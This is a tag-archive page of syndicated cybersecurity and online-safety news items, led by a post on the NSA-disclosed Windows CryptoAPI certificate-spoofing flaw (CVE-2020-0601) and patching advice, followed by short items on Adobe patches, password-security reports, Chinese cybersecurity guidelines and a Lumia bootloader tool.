releases

now browsing by tag

 
 

#cybersecurity | #hackerspace | NSA: Microsoft Releases Patch to Fix Latest Windows 10 Vulnerability

Source: National Cyber Security – Produced By Gregory Evans

NSA discloses a Windows security flaw that leaves more than 900 million devices vulnerable to spoofed digital certificates

The National Security Agency (NSA) isn’t exactly known for wanting to share information about vulnerabilities they discover. In fact, they kept the Microsoft bug known as Eternal Blue a secret for at least five years to exploit it as part of their digital espionage. (At least, you know, until it was eventually discovered and released by hackers).

But maybe they’ve had a change of heart. (If you truly
believe that, I have a bridge to sell you.)

The NSA, in an uncharacteristic show of transparency, recently announced a major public key infrastructure (PKI) security issue that exists in Microsoft Windows operating systems that’s left more than 900 million PCs and servers worldwide vulnerable to spoofing cyberattacks. This vulnerability is one of many vulnerabilities Microsoft released as part of their January 2020 security updates. Maybe they didn’t want a repeat of the last incident. Whatever the reason, we’re just glad they decided to disclose the potential exploit.

This risk of this vulnerability boils down to a weakness in
the application programming interface of Microsoft’s widely used operating
systems. But what exactly is this Windows 10 vulnerability? How does it affect
your organization? And what can you do to fix it?

Let’s hash it out.

What’s the Situation with This Windows 10 Vulnerability?

Windows 10 has been having a rough go of things these past several months in terms of vulnerabilities. In the latest Window 10 vulnerability news, the NSA discovered a vulnerability (CVE-2020-0601) that affects the cryptographic functionality of Microsoft Windows 32- and 64-bit Windows 10 operating systems and specific versions of Windows Server. Basically, the vulnerability exists within the Windows 10 cryptographic application programming interface — what’s also known as CryptoAPI (or what you may know as the good ol’ Crypt32.dll module) — and affects how it validates elliptic curve cryptography (ECC) certificates.

What it does, in a nutshell, is allow users to create websites and software that masquerade as the “real deals” through the use of spoofed digital certificates. A great example of how it works was created by a security researcher, Saleem Rashid, who tweeted images of NSA.com and Github.com getting “Rickrolled.” Essentially, what he did was cause both the Edge and Chrome browsers to spoof the HTTPS verified websites.

Although humorous, Rashid’s simulated attacks are a great
demonstration of how serious the security flaw is. By spoofing a digital
certificate to exploit the security flaw in CryptoAPI, it means that anyone can
pretend to be anyone — even official authorities.

CryptoAPI is a critical component of Microsoft Windows operating systems. It’s what allows developers to secure their software applications through cryptographic solutions. It’s also what validates the legitimacy of software and secure website connections through the use of X.509 digital certificates (SSL/TLS certificates, code signing certificates, email signing certificates, etc.). So, basically, the vulnerability’s a bug in the OS’s appliance for determining whether software applications and emails are secure, and whether secure website connections are legitimate.

So, what the vulnerability does is allow actors to bypass
the trust store by using malicious software that are signed by forged/spoofed ECC
certificates (doing so makes them look like they’re signed by a trusted
organization). This means that users would unknowingly download malicious or
compromised software because the digital signature would appear to be from a
legitimate source.

This vulnerability can cause other issues as well, according to the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA):

This could deceive users or thwart malware detection methods such as antivirus. Additionally, a maliciously crafted certificate could be issued for a hostname that did not authorize it, and a browser that relies on Windows CryptoAPI would not issue a warning, allowing an attacker to decrypt, modify, or inject data on user connections without detection.”

Does This Mean ECC Is Not Secure?

No. This flaw in no way, shape, or form affects the
integrity of ECC certificates. It does, however, cast a negative light on
Windows’ cryptographic application programming interface by shining a spotlight
on the shortcomings of its validation process.

Let me reiterate: This is a flaw concerning Windows
CryptoAPI and does not affect the integrity of the ECC certificates themselves.

If you’re one of the few using ECC certificates (you know, since RSA is still
the more commonly used than ECC), this doesn’t impact the security of your certificates.

The patch from Microsoft addresses the vulnerability to
ensure that Windows CryptoAPI fully validates ECC certificates.

What This Windows 10 Vulnerability Means for Your Organization

Basically, this cryptographic validation security flaw
impacts both the SSL/TLS communication stream encryption and Windows
Authenticode file validation. Malicious actors who decide to exploit the CryptoAPI
vulnerability could use it to:

  • defeat trusted network connections to carry out man-in-the-middle (MitM) attacks and compromise confidential information;
  • deliver malicious executable code;
  • prevent browsers that rely on CryptoAPI from validating malicious certificates that are crafted to appear from an unauthorized hostname; and
  • appear as legitimate and trusted entities (through spoofing) to get users to engage with and download malicious content via email and phishing websites.

The NSA press release states:

NSA assesses the vulnerability to be severe and that sophisticated cyber actors will understand the underlying flaw very quickly and, if exploited, would render the previously mentioned platforms as fundamentally vulnerable. The consequences of not patching the vulnerability are severe and widespread. Remote exploitation tools will likely be made quickly and widely available. Rapid adoption of the patch is the only known mitigation at this time and should be the primary focus for all network owners.”

Steps to Take to Mitigate This Bug

Wondering what you should do to mitigate the threat on your
network and devices? The NSA has a few recommendations:

Get to Patchin’ ASAP

The NSA recommends installing a newly-released patch from Microsoft for Windows 10 operating systems and Windows Server (versions 2016 and 2019) as soon as possible on all endpoints and systems. Like, right now. Get to it! As a best practice, you also can turn on automatic updates to ensure that you don’t miss key updates in the future.

According to Microsoft’s Security Update Guide:

After the applicable Windows update is applied, the system will generate Event ID 1 in the Event Viewer after each reboot under Windows Logs/Application when an attempt to exploit a known vulnerability ([CVE-2020-0601] cert validation) is detected.”

Here at The SSL Store, we’ve already rolled out the patch to ensure that all of our servers and endpoint devices are protected. (Thanks, Ross!) Rolling out these kinds of updates is something you don’t want to wait around to do because it leaves your operating systems — and everything else as a result — vulnerable to spoofing and phishing attacks using spoofed digital certificates.

Prioritize Your Patching Initiatives

But what if you’re a major enterprise that can’t just get it
done with a snap of the fingers? (Yeah, we know how you big businesses
sometimes like to do things.) In that case, they recommend prioritizing
patching your most critical endpoints and those that are most exposed to the
internet. Basically,
patch your
mission-critical systems and infrastructure, internet-facing systems, and
networked servers first.

Implement Network Prevention and Detection Measures

For those of you who route your traffic through proxy
devices, we have some good news. While your endpoints are getting patched, your
proxy devices can help you detect and isolate vulnerable endpoints. That’s
because you can use TLS inspection proxies to validate SSL/TLS certificates
from third parties and determine whether to trust or reject them.

You also can review logs and packet analysis to extract
additional data for analysis and check for malicious or suspicious properties.

*** This is a Security Bloggers Network syndicated blog from Hashed Out by The SSL Store™ authored by Casey Crane. Read the original post at: https://www.thesslstore.com/blog/nsa-microsoft-releases-patch-to-fix-latest-windows-10-vulnerability/

Source link

The post #cybersecurity | #hackerspace |<p> NSA: Microsoft Releases Patch to Fix Latest Windows 10 Vulnerability <p> appeared first on National Cyber Security.

View full post on National Cyber Security

#cybersecurity | #infosec | LastPass releases its 3rd Annual Global Password Security report

Source: National Cyber Security – Produced By Gregory Evans

LastPass releases its 3rd Annual Global Password Security report

Graham Cluley Security News is sponsored this week by the folks at LastPass. Thanks to the great team there for their support!

LastPass has analyzed over 47,000 businesses to bring you insights into security behavior worldwide. The report helps you explore changes in password security practices worldwide, and see where businesses are still putting themselves at risk.

The takeaway is clear: Many businesses are making significant strides in some areas of password and access security – but there is still a lot of work to be done. Use of important security measures like multifactor authentication is up, but the continued reality of poor password hygiene still hampers many business’ ability to achieve high standards of security.

In the report, we not only highlight key trends by company size, sector, and location, we provide analysis and recommendations to help IT and business leaders take action where it’s needed most.

Download the free report now to see the current state of password security, access, and authentication around the world – and learn what you can do today to better secure your company.


If you’re interested in sponsoring my site for a week, and reaching an IT-savvy audience that cares about computer security, you can find more information here.

Source link

The post #cybersecurity | #infosec | LastPass releases its 3rd Annual Global Password Security report appeared first on National Cyber Security.

View full post on National Cyber Security

Adobe Releases Patches for ‘Likely Exploitable’ Critical Vulnerabilities

Source: National Cyber Security – Produced By Gregory Evans

adobe software update

The last Patch Tuesday of 2019 is finally here.

Adobe today released updates for four of its widely used software—including Adobe Acrobat and Reader, Photoshop CC, ColdFusion, and Brackets—to patch a total of 25 new security vulnerabilities.

Seventeen of these flaws have been rated as critical in severity, with most of them carrying high priority patches, indicating that the vulnerabilities are more likely to be used in real-world attacks, but there are currently no known exploits in the wild.

The software update for Adobe Acrobat and Reader for Windows and macOS operating systems addresses a total of 21 security vulnerabilities, 14 of which are critical, and rest are important in severity.

Upon successful exploitation, all critical vulnerabilities in Adobe Acrobat and Reader software lead to arbitrary code execution attacks, allowing attackers to take complete control of targeted systems.

Adobe Photoshop CC for Windows and macOS contains patches for two critical arbitrary code execution vulnerabilities that were discovered and reported to the company by Honggang Ren of Fortinet’s FortiGuard Labs.

The last two flaws the company patched this month affect Brackets, a source code editor, and ColdFusion, a commercial rapid web application development platform by Adobe.

Web Application Firewall

The software update for Brackets addresses a critical code execution flaw, which was disclosed by Tavis Ormandy of Google Project Zero.

Adobe ColdFusion update comes with a security patch for an important privilege escalation bug, which occurs due to insecure inherited permissions of the default installation directory.

The company has released updated versions for all four vulnerable software for each impacted platform that users should install immediately to protect their systems and businesses from cyber-attacks.

If your system hasn’t yet detected the availability of the new update automatically, you should manually install the update by choosing “Help → Check for Updates” in your Adobe software.

The Original Source Of This Story: Source link

The post Adobe Releases Patches for ‘Likely Exploitable’ Critical Vulnerabilities appeared first on National Cyber Security.

View full post on National Cyber Security

China Releases Four Draft Guidelines in Relation to Cybersecurity Law

Source: National Cyber Security – Produced By Gregory Evans

On August 31, 2017, the National Information Security Standardization Technical Committee of China published four draft voluntary guidelines (“Draft Guidelines”) in relation to the Cybersecurity Law of China. The Draft Guidelines are open for comment from the general public until October 13, 2017. Information Security Technology – Guidelines for Cross-Border…

The post China Releases Four Draft Guidelines in Relation to Cybersecurity Law appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

China releases emergency response plan for cyber security incidents

Source: National Cyber Security – Produced By Gregory Evans

People’s Daily China reported that the Office of the Central Leading Group for Cyberspace Affairs has released a new emergency response plan for Internet security incidents on June 27. The plan is intended to “improve handling of cybersecurity incidents, prevent and reduce damage, protect the public interest and safeguard national…

The post China releases emergency response plan for cyber security incidents appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Rep releases draft ‘hacking back’ legislation

more information on sonyhack from leading cyber security expertsSource: National Cyber Security – Produced By Gregory Evans Rep. Tom Graves (R-Ga.) released updated legislation Thursday to allow victims of cyber crimes to hack their attackers back. The Active Cyber Defense Certainty Act (ACDC) would exempt victims from hacking laws when the aim is to identify the assailant, cut off attacks or retrieve stolen […] View full post on AmIHackerProof.com | Can You Be Hacked?

Pearl Software Releases Echo Smart.Capture™ For Targeted Cybersecurity Analytics

Pearl Software, the creator of real-time, mobile Internet monitoring and web filtering has released Echo Smart.Capture as part of its cybersecurity product line. Pearl Echo Version 12 R2 now includes the ability to monitor a user’s web browsing while filtering … View full post on National Cyber Security Ventures

Father releases photos of bullied daughter moments from death on day she would have turned 18

A father has published photos showing his daughter minutes before she died to raise awareness of cyber-bullying and mental illness.

Adrian Derbyshire posted pictures of Julia hooked up to drips and machines in hospital to mark what would have been her 18th birthday.

Julia was 16 when Mr Derbyshire found her body at the family home in Warrington.

He attempted CPR, but she spent five days in hospital on life support and died in December 2015.

“I can’t tell you all how I feel as I’ve gone past the line of devastation and loss,” said Mr Derbyshire, writing on Facebook.

“But this devastating story of a beautiful young woman who had given up on herself and life due to others needs to be heard.

Read More

The post Father releases photos of bullied daughter moments from death on day she would have turned 18 appeared first on Parent Security Online.

View full post on Parent Security Online

MeetMe Releases Revamped MeetMe+ Subscription App

BUSINESS WIRE – Dec 10 – MeetMe, a public social discovery service, has released a major revamp of its MeetMe+ subscription product to increase the number of paying subscribers. Read More….

The post MeetMe Releases Revamped MeetMe+ Subscription App appeared first on Dating Scams 101.

View full post on Dating Scams 101

Hacker Cracks Lumia Bootloader, Releases Tool To Grant Root Access For Custom ROMs

Source: National Cyber Security – Produced By Gregory Evans

Hacker Cracks Lumia Bootloader, Releases Tool To Grant Root Access For Custom ROMs

Microsoft and Nokia have done a great job of making Lumia smartphones difficult to break into at a low-level, but software hacker Heathcliff has just proven that it’s not impossible. He’s just released a great-looking tool called Phone Internals, and it can do everything from unlocking the bootloader to replacing the phone’s ROM. Heathcliff welcomes donations by those who’ve found the tool useful. Based on the introduction video, it seems that a lot of effort went into this, and unlike most tools of this nature, detailed descriptions are found everywhere to ensure that you know exactly what’s going to happen once you click a button. According to the “Getting Started” section of the tool, supported models include Lumia 520, 521, 525, 620, 625, 720, 820, 920, 925, 928, 1020, and 1320. If your model is not on the list, don’t fret: Heathcliff has said that he hopes to add more models in the future. Even if you do have an appropriate PHONE ROM or run custom software, this tool could be used to root the device and give you the ability to back up the entire thing. Options are given to back up specific partitions, or everything en masse. Later, […]

For more information go to http://www.NationalCyberSecurity.com, http://www. GregoryDEvans.com, http://www.LocatePC.net or http://AmIHackerProof.com

The post Hacker Cracks Lumia Bootloader, Releases Tool To Grant Root Access For Custom ROMs appeared first on National Cyber Security.

View full post on National Cyber Security